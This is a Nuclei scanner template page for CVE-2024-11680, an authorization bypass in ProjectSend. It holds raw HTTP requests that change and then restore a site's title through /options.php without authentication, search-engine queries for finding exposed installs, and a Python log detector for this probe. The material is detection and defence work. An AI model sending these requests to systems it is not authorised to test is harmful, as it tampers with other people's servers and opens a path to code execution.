ProjectSend <= r1605 - Improper Authorization
ID: CVE-2024-11680
Severity: critical
Author: DhiyaneshDK
Tags: cve,cve2024,projectsend,auth-bypass,intrusive,kev
Description
An improper authorization check was identified within ProjectSend version r1605 that allows an attacker to perform sensitive actions such as enabling user registration and auto-validation, or adding new entries to the whitelist of allowed extensions for uploaded files. Ultimately, this allows an attacker to execute arbitrary PHP code on the server hosting the application.
YAML Source

id: CVE-2024-11680

info:
  name: ProjectSend <= r1605 - Improper Authorization
  author: DhiyaneshDK
  severity: critical
  description: |
    An improper authorization check was identified within ProjectSend version r1605 that allows an attacker to perform sensitive actions such as enabling user registration and auto validation, or adding new entries in the whitelist of allowed extensions for uploaded files. Ultimately, this allows to execute arbitrary PHP code on the server hosting the application.
  reference:
    - https://www.projectsend.org/
    - https://www.synacktiv.com/sites/default/files/2024-07/synacktiv-projectsend-multiple-vulnerabilities.pdf
    - https://vulncheck.com/advisories/projectsend-bypass
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-11680
    cwe-id: CWE-287,CWE-863
    epss-score: 0.46821
    epss-percentile: 0.97618
    cpe: cpe:2.3:a:projectsend:projectsend:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: projectsend
    product: projectsend
    shodan-query:
      - http.html:"projectsend"
      - http.html:"projectsend setup"
      - http.html:"provided by projectsend"
    fofa-query:
      - body="projectsend"
      - body="projectsend setup"
      - body=provided by projectsend
    google-query: intext:provided by projectsend
  tags: cve,cve2024,projectsend,auth-bypass,intrusive,kev

variables:
  string: "{{randstr}}"

flow: http(1) && http(2) && http(3) && http(4) && http(5)

http:
  # Request 1: fingerprint the login page and read the CSRF token and current install title
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "projectsend")'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: csrf
        group: 1
        regex:
          - 'name="csrf_token" value="([0-9a-z]+)"'
        internal: true

      - type: regex
        name: title
        group: 1
        regex:
          - '<title>Log in » ([0-9a-zA-Z]+)<\/title>'
        internal: true

  # Request 2: unauthenticated change of the install title to a random string
  - raw:
      - |
        POST /options.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        csrf_token={{csrf}}&section=general&this_install_title={{string}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 500'
          - 'contains(content_type, "text/html")'
        condition: and
        internal: true

  # Request 3: confirm the random title is now served on the front page
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "{{string}}")'
        condition: and
        internal: true

  # Request 4: restore the original install title
  - raw:
      - |
        POST /options.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        csrf_token={{csrf}}&section=general&this_install_title={{title}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 500'
          - 'contains(content_type, "text/html")'
        condition: and
        internal: true

  # Request 5: confirm the original title is back
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "{{title}}")'
        condition: and
# digest: 490a00463044022069e33d6bf9c7e823ca82d568cf32ce5078da4ebe9869fab89ec5b16ff6ff1c1e02207dcab84f6280bfaabe123a066786187df522eecfe7ad7d2796d8955eb8b30fa4:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template checks a target for the ProjectSend improper authorization flaw described above. Note the intrusive tag: the check writes the installation title through /options.php and then restores the original value. Run it with the Nuclei tool:
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-11680.yaml"
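As an added defender-side example (not part of this template or the ProjectSend project), the following Python script runs the detection side of this check over web-server access-log lines: it flags clients whose POST to /options.php drew an HTTP 500, the response the template's second and fourth requests match on. The log format, client addresses and timestamps are constructed for illustration.

```python
import re
from collections import defaultdict

# Combined/common log format: client, identity, user, [timestamp], "request", status, size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample lines (not real traffic). The first client mirrors the
# template's flow: GET /, POST /options.php (500), GET /, POST /options.php (500).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jan/2025:10:00:01 +0000] "GET / HTTP/1.1" 200 5120
203.0.113.7 - - [10/Jan/2025:10:00:02 +0000] "POST /options.php HTTP/1.1" 500 0
203.0.113.7 - - [10/Jan/2025:10:00:03 +0000] "GET / HTTP/1.1" 200 5131
203.0.113.7 - - [10/Jan/2025:10:00:04 +0000] "POST /options.php HTTP/1.1" 500 0
198.51.100.4 - - [10/Jan/2025:10:05:00 +0000] "POST /options.php?section=general HTTP/1.1" 200 0
198.51.100.4 - - [10/Jan/2025:10:05:01 +0000] "GET /index.php HTTP/1.1" 200 4800
"""


def parse(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_options_tamper(log_text, min_hits=1):
    """Return {client_ip: count} for clients whose POST /options.php got an HTTP 500.

    That status is what the template's matchers expect from a vulnerable instance
    while the option change still takes effect, so it is the cheapest log signal
    for this probe. min_hits lets a caller require repeated occurrences.
    """
    hits = defaultdict(int)
    for line in log_text.splitlines():
        rec = parse(line)
        if not rec:
            continue
        path = rec["path"].split("?", 1)[0]  # ignore any query string
        if rec["method"] == "POST" and path == "/options.php" and rec["status"] == "500":
            hits[rec["ip"]] += 1
    return {ip: n for ip, n in hits.items() if n >= min_hits}


if __name__ == "__main__":
    for ip, n in find_options_tamper(SAMPLE_LOG).items():
        print(f"{ip}: {n} x POST /options.php -> 500 (possible CVE-2024-11680 probe)")
```

Pair a hit with a change of the site title between the surrounding GET / responses, as the template itself verifies, to raise confidence before alerting.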